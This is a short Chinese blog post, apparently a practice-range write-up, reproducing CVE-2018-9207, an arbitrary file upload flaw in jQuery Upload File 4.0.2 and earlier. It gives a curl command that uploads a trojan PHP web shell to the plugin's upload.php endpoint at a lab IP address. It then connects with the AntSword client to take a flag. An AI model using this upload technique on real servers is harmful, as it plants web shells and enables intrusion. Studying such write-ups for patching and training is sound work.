cve_2018_9207 jQuery檔案上傳
jQuery是一個JavaScript框架,我們可以直接在他的根目錄下上傳我們的木馬檔案
jQuery Upload File <= 4.0.2 中的任意檔案上傳 根目錄下/jquery-upload-file
復現
1. 如果訪問一個網站之后,是ubuntu的web界面

2. 發現是jQuery框架,并且版本是jQuery Upload File <= 4.0.2,我這里是靶場,知道他有這個漏洞,他的根目錄下有上傳檔案介面,直接利用curl進行上傳檔案,
php.php是我們本地的一個木馬檔案,
/jquery-upload-file/php/upload.php是上傳檔案的介面,
curl -F "[email protected]" "http://123.58.236.76:11943/jquery-upload-file/php/upload.php"

3. 木馬檔案上傳之后,直接利用蟻箭進行連接,這一步重要的就是要找到上傳的木馬檔案的存盤目錄,

4. 連接成功之后,拿到flag,實際環境中,還可以進行更進一步的利用,那看自己的情況,我覺得點到為止,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/431017.html
標籤:其他
